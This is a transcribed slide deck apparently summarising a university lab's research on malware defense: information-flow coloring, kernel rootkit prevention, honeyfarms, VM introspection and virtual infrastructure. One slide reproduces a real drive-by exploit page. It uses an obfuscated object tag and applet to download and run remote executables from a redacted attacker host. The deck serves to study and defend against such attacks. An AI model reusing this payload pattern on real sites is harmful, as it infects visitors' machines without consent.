240 likes | 414 Views
Research at FRIENDS Lab http://friends.cs.purdue.edu Dongyan Xu Associate Professor Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University. Malware Defense Honeyfarm (Collapsar) Playground (vGround)
E N D
Research at FRIENDS Lab http://friends.cs.purdue.edu Dongyan Xu Associate Professor Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University
Malware Defense • Honeyfarm (Collapsar) • Playground (vGround) • VM introspection (OBSERV) • OS info. flow (Proc. Coloring) • Kernel rootkit (NICKLE) • Reverse engr. (AutoFormat) • Virtual Infrastructures • VIOLIN virtual infrastructure • Infrastructure adaptation • Infrastructure snapshot • Real-world deployment • (http://www.nanohub.org) Virtualization Technology (Xen, QEMU, VirtualBox, KVM, VMware) Research Overview
Project 1: Process Coloring: Information Flow-based Malware Defense • Funded by IARPA through AFRL • One-sentence summary: • Propagating and logging provenance information (“colors”) along OS-level information flows for malware detection and sensitive data protection • Prototype integration with Southwest Research Institute • Demo CD completed today!
PC Usage Scenario: Server-Side Malware Defense Capability 1: PC malware alert “No shell process should have the color of Apache” Initial coloring s30sendmail s30sendmail s55sshd s55sshd Syscall Log s45named s45named init rc s80httpd s80httpd • /etc/shadow • Confidential Info httpd netcat Capability 3: Color-based log partition for contamination analysis Local files /bin/sh Capability 2: Color-based identification of malware break-in point Coloring diffusion wget Rootkit Demo at: http://friends.cs.purdue.edu/projects/pc/pc-demo.html
PC Usage Scenario: Client-Side Malware Defense www.malicious.net turbotax Tax warcraft Games notepad Editor firefox Web Browser PC malware alert “Web browser and tax colors should never mix” Agobot Tax files Agobot Demo at: http://friends.cs.purdue.edu/projects/pc/files/sinkfile.avi
Project 2:Strategic Defense against Kernel Rootkit Attacks • Kernel rootkits: stealthy and foundational threat to cyberspace • Current defense: • Symptom-based detection • Disruption to production system • Manual forensics • Strategic defense: • Proactive indication before attack • Automatic avoidance by “steering away” production system (non-stop operation) • Live forensics for future protection
Integrated Defense Scenario Right before attack After threat indication Production VM Forensics VM Production VM Guest OS Guest OS Guest OS Forensics Indication Clean-up VMM VMM VMM Avoidance Fork Rootkit Profile Kernel Guarding Code
Results with Real-World Kernel Rootkits [RAID08 Best Paper Award] • Indicating and preventing kernel rootkit attacks at VMM level
Thank you! For more information: URL:http://friends.cs.purdue.edu(on a VM) Google:“Purdue virtualization friends” Email:dxu@cs.purdue.edu
NICKLE: Kernel Rootkit Indicator “No Instruction Creeping into Kernel Level Executed” • Step 1: Create two memory spaces • Standard memory • Shadow memory • Step 2: Authenticate and copy kernel code to shadow memory • Step 3: Memory access dispatch • Kernel code fetch -> shadow memory • All other accesses -> standard memory Guest OS VMM NICKLE Kernel Code Kernel Code Standard memory Shadow memory
Collapsar Honeyfarm [USENIX Security’04] Domain A Benefit 2: Off-site attack occurrence Redirector Domain C Front-End Redirector Redirector Domain B Collapsar Center VM-based Honeypots Management Station Correlation Engine Benefit 1: Centralized management of honeypots w/ distributed presence Benefit 3: Convenience for real-time attack correlation and log mining Collapsar Honeyfarm
Domain A Malicious Web Server Redirector Domain C Front-End Redirector Redirector Domain B Collapsar Center VM-based Honeypots Collapsar as a Client-side Honeyfarm • Active Honeypots w/ Vulnerable Client-side Software • Web Browsers (e.g., IE, Firefox, …) • Email Clients (e.g., Outlook, …) PlanetLab (310 sites) [ HoneyMonkey, NDSS’06] 288 malicious sites / 2 zero-day exploits
A Real Incident [JPDC’06] • Upon Clicking a malicious URL • http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html <html><head><title></title></head><body> <style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style> <APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1> <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET> <script> try{ document.write('<object data=`ms-its: mhtml:file: //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){}</script> </body></html> MS05-002 MS03-011 MS04-013 22 unwanted programs installed without user’s consent!
vGround: A Virtual Worm Playground(demo) [RAID’05] A Worm Playground • High fidelity • VM: full-system virtualization • Strict confinement • VN: link-layer network virtualization • Easy deployment • Locally deployable • Efficient experiments • Images generation time: 60 seconds • Boot-strap time: 90 seconds • Tear-down time: 10 seconds dallas.cs.purdue.edu In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004
State-of-the-art malware defense Running anti-malware software inside the monitored system Advantage: They can see everything (e.g., files, processes…) Disadvantage: They may not see anything! OBSERV: “Out-of-the-Box” Malware Detection IE Firefox VirusScan … OS Kernel
Why “Out-of-the-Box”? Current approach fundamentally flawed Anti-malware software and protected software running at the same privilege level Lack of root-of-trust Solution: Going “out-of-the-box” VirusScan IE Firefox … OS Kernel ? Virtual Machine Monitor (VMM)
The “Semantic-Gap” Challenge What we can observe: Low-level states Memory pages, disk blocks… Low-level events Privileged instructions, Interrupts, I/O… VirusScan Semantic Gap Guest OS Virtual Machine Monitor (e.g., VMware, Xen) • What we want to observe: • High-level semantic states • Files, processes… • high-level semantic events • System calls, context switches…
Our Solution: OBSERV OBSERV: “Out-of-the-Box” with SEmantically Reconstructed View A new mechanism missing in existing VMMs [ACM CCS’07] IE Firefox … OS Kernel OBSERV Virtual Machine Monitor (VMM)
New Capabilities Enabled by OBSERV Inside-the-box View OBSERV View IE Firefox … OS Kernel OBSERV Virtual Machine Monitor (VMM) Diff Capability I: Invisible system logging Capability II: Malware detection by view comparison Capability III: External run of COTS anti-malware software
AutoFormat: Malware Protocol Reverse Engineering [NDSS’08] • Given malware binary, infer malware protocol format
Inferring Slapper Worm (Botnet) Protocol Nested data structure declaration 1 1 2 2 3 Compiler inserted gap
Internet VIOLIN: Portable, Adaptive Virtual Environments [TR’03, IEEE Computer’05] • Adaptive Virtual Environments on a shared hosting infrastructure DB DB
Adaptation Architecture and Sample Scenario (Demo) [IEEE ICAC’06] VMs VMs VIOLIN Switch VIOLIN Switch VIOLIN Switch VIOLIN Switch Monitoring Daemon Monitoring Daemon VMM VMM VMs VMs Physical Network VIOLIN Switch VIOLIN Switch VIOLIN Switch CPU Update Monitoring Daemon Monitoring Daemon Adaptation Manager VMM VMM Scale Up Migrate
Live VIOLIN Snapshot (Demo) [ACM/IEEE VTDC’07] Snapshot Resume • Useful for application and OS transparent recovery from • Crashes, failures, and disasters • Unexpected power/network outage • And for VIOLIN replay Hosting center Hosting center